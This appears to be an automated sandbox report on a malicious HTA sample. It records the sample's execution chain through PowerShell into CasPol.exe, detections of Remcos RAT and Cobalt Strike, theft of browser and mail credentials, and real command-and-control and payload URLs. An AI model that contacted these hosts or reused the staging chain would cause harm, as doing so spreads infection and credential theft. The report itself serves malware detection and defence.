                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00404915 GetLocalTime,CreateEventA,CreateThread,10_2_00404915
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041A7B2 GetComputerNameExW,GetUserNameW,10_2_0041A7B2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_0044801F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041739B GetVersionExW,11_2_0041739B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.4497247873.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6220, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data10_2_0040B21B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\10_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db10_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: ESMTPPassword12_2_004033F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword12_2_00402DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword12_2_00402DB3
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 7124, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-B3IX49Jump to behavior
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.4497247873.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6220, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe10_2_00405042
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting
                      Valid Accounts11
                      Native API
                      111
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      2
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution
                      1
                      DLL Side-Loading
                      1
                      Bypass User Account Control
                      2
                      Obfuscated Files or Information
                      111
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      12
                      Ingress Tool Transfer
                      Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts132
                      Command and Scripting Interpreter
                      1
                      Windows Service
                      1
                      Access Token Manipulation
                      1
                      DLL Side-Loading
                      2
                      Credentials in Registry
                      1
                      System Service Discovery
                      SMB/Windows Admin Shares11
                      Email Collection
                      21
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution
                      Login Hook1
                      Windows Service
                      1
                      Bypass User Account Control
                      3
                      Credentials In Files
                      3
                      File and Directory Discovery
                      Distributed Component Object Model111
                      Input Capture
                      1
                      Non-Standard Port
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts3
                      PowerShell
                      Network Logon Script422
                      Process Injection
                      1
                      Masquerading
                      LSA Secrets39
                      System Information Discovery
                      SSH3
                      Clipboard Data
                      1
                      Remote Access Software
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials31
                      Security Software Discovery
                      VNCGUI Input Capture2
                      Non-Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Access Token Manipulation
                      DCSync21
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal Capture213
                      Application Layer Protocol
                      Exfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                      Process Injection
                      Proc Filesystem4
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Owner/User Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575616 Sample: givenbestupdatedoingformebe... Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 58 kelexrmcadmnnccupdated.duckdns.org 2->58 60 paste.ee 2->60 62 2 other IPs or domains 2->62 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 86 17 other signatures 2->86 12 mshta.exe 1 2->12         started        signatures3 82 Uses dynamic DNS services 58->82 84 Connects to a pastebin service (likely for C&C) 60->84 process4 signatures5 112 Suspicious command line found 12->112 114 PowerShell case anomaly found 12->114 15 cmd.exe 1 12->15         started        process6 signatures7 116 Detected Cobalt Strike Beacon 15->116 118 Suspicious powershell command line found 15->118 120 Wscript starts Powershell (via cmd or directly) 15->120 122 PowerShell case anomaly found 15->122 18 powershell.exe 42 15->18         started        23 conhost.exe 15->23         started        process8 dnsIp9 64 192.3.122.159, 49704, 80 AS-COLOCROSSINGUS United States 18->64 52 entiretimeneedgood...ingswithgoodnew.vbS, Unicode 18->52 dropped 54 C:\Users\user\AppData\...\brz1t20s.cmdline, Unicode 18->54 dropped 88 Loading BitLocker PowerShell Module 18->88 25 wscript.exe 1 18->25         started        28 csc.exe 3 18->28         started        file10 signatures11 process12 file13 98 Detected Cobalt Strike Beacon 25->98 100 Suspicious powershell command line found 25->100 102 Wscript starts Powershell (via cmd or directly) 25->102 104 2 other signatures 25->104 31 powershell.exe 15 16 25->31         started        56 C:\Users\user\AppData\Local\...\brz1t20s.dll, PE32 28->56 dropped 35 cvtres.exe 1 28->35         started        signatures14 process15 dnsIp16 70 paste.ee 104.21.84.67, 443, 49742 CLOUDFLARENETUS United States 31->70 72 Writes to foreign memory regions 31->72 74 Injects a PE file into a foreign processes 31->74 37 CasPol.exe 3 13 31->37         started        41 conhost.exe 31->41         started        signatures17 process18 dnsIp19 66 kelexrmcadmnnccupdated.duckdns.org 107.173.143.31, 14646, 49753, 49759 AS-COLOCROSSINGUS United States 37->66 68 geoplugin.net 178.237.33.50, 49760, 80 ATOM86-ASATOM86NL Netherlands 37->68 90 Contains functionality to bypass UAC (CMSTPLUA) 37->90 92 Detected Remcos RAT 37->92 94 Tries to steal Mail credentials (via file registry) 37->94 96 7 other signatures 37->96 43 CasPol.exe 37->43         started        46 CasPol.exe 37->46         started        48 CasPol.exe 14 37->48         started        50 CasPol.exe 37->50         started        signatures20 process21 signatures22 106 Tries to steal Instant Messenger accounts or passwords 43->106 108 Tries to steal Mail credentials (via file / registry access) 43->108 110 Tries to harvest and steal browser information (history, passwords, etc) 46->110

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      givenbestupdatedoingformebestthingswithgreatnewsformegive.hta28%VirustotalBrowse
                      givenbestupdatedoingformebestthingswithgreatnewsformegive.hta13%ReversingLabsScript-JS.Phishing.Generic
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      kelexrmcadmnnccupdated.duckdns.org0%Avira URL Cloudsafe
                      http://192.3.122.159/0%Avira URL Cloudsafe
                      http://192.3.122.159/47/entireti0%Avira URL Cloudsafe
                      http://192.3.122.159/47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIF;?0%Avira URL Cloudsafe
                      http://192.3.122.159/fault0%Avira URL Cloudsafe
                      http://crl.microY0%Avira URL Cloudsafe
                      http://192.3.122.159/47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIFC:0%Avira URL Cloudsafe
                      http://www.microsoft.z0%Avira URL Cloudsafe
                      http://192.3.122.159/47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIF0%Avira URL Cloudsafe
                      http://crl.microl0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      paste.ee
                      104.21.84.67
                      truefalse
                        high
                        kelexrmcadmnnccupdated.duckdns.org
                        107.173.143.31
                        truetrue
                          unknown
                          geoplugin.net
                          178.237.33.50
                          truefalse
                            high
                            res.cloudinary.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              kelexrmcadmnnccupdated.duckdns.orgtrue
                              • Avira URL Cloud: safe
                              unknown
                              http://geoplugin.net/json.gpfalse
                                high
                                http://192.3.122.159/47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIFtrue
                                • Avira URL Cloud: safe
                                unknown
                                https://paste.ee/r/qr9V8/0false
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.imvu.comrCasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                    high
                                    http://crl.microsoftpowershell.exe, 00000007.00000002.2437578086.00000000079C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://analytics.paste.eepowershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.nirsoft.netCasPol.exe, 0000000B.00000002.2476487096.0000000001334000.00000004.00000010.00020000.00000000.sdmpfalse
                                            high
                                            http://go.microspowershell.exe, 00000003.00000002.2160140336.0000000004FDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comCasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                high
                                                https://www.google.compowershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  high
                                                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    high
                                                    https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.2160140336.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2409021944.0000000004D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgtpowershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/powershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2161760201.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://192.3.122.159/47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIF;?powershell.exe, 00000003.00000002.2159670974.0000000002B56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://192.3.122.159/faultpowershell.exe, 00000003.00000002.2164993649.0000000008071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://login.yahoo.com/config/loginCasPol.exefalse
                                                              high
                                                              https://cdnjs.cloudflare.compowershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgpowershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://cdnjs.cloudflare.com;powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.nirsoft.net/CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2160140336.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2409021944.0000000004D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://secure.gravatar.compowershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2161760201.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2160140336.0000000004B58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://geoplugin.net/json.gplCasPol.exe, 0000000A.00000002.4498075941.0000000000DB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2160140336.0000000004B58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.google.com;powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://192.3.122.159/powershell.exe, 00000003.00000002.2164993649.0000000008071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.imvu.comCasPol.exe, CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://contoso.com/Iconpowershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://192.3.122.159/47/entiretipowershell.exe, 00000003.00000002.2160140336.0000000004EC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://crl.microYpowershell.exe, 00000007.00000002.2407825131.0000000003487000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://192.3.122.159/47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIFC:powershell.exe, 00000003.00000002.2164993649.0000000008071000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.microsoft.zpowershell.exe, 00000003.00000002.2164993649.00000000080A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://res.cloudinary.compowershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crl.microlpowershell.exe, 00000007.00000002.2438035679.0000000007A29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://crl.micropowershell.exe, 00000003.00000002.2163027250.00000000070C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2160140336.0000000004B58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://analytics.paste.ee;powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                                        high
                                                                                                        https://themes.googleusercontent.compowershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://github.com/dahall/taskschedulerpowershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ebuddy.comCasPol.exe, CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              107.173.143.31
                                                                                                              kelexrmcadmnnccupdated.duckdns.orgUnited States
                                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                                              192.3.122.159
                                                                                                              unknownUnited States
                                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                                              178.237.33.50
                                                                                                              geoplugin.netNetherlands
                                                                                                              8455ATOM86-ASATOM86NLfalse
                                                                                                              104.21.84.67
                                                                                                              paste.eeUnited States
                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1575616
                                                                                                              Start date and time:2024-12-16 07:14:04 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 10m 16s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:16
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:givenbestupdatedoingformebestthingswithgreatnewsformegive.hta
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@26/19@4/4
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 85.7%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 99%
                                                                                                              • Number of executed functions: 164
                                                                                                              • Number of non-executed functions: 308
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .hta
                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                              • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 2.16.96.33, 13.107.246.63, 20.109.210.53, 20.12.23.50
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ion.cloudinary.com.edgekey.net, e1315.dsca.akamaiedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 2584 because there are no executed function
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
